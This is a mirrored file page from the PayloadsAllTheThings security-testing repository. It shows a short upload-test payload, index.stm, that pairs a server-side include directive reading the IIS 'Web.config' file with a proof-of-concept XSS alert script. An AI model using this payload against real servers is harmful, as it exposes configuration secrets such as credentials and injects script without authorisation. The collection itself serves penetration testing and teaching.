1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-04-18 23:08:04 +02:00
PayloadsAllTheThings/Upload Insecure Files/Server Side Include/index.stm
2019-03-07 00:07:55 +01:00

15 lines
197 B
Plaintext

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title></title>
</head>
<body>
<!-- #include file = "Web.config" -->
<script>alert('XSS')</script>
</body>
</html>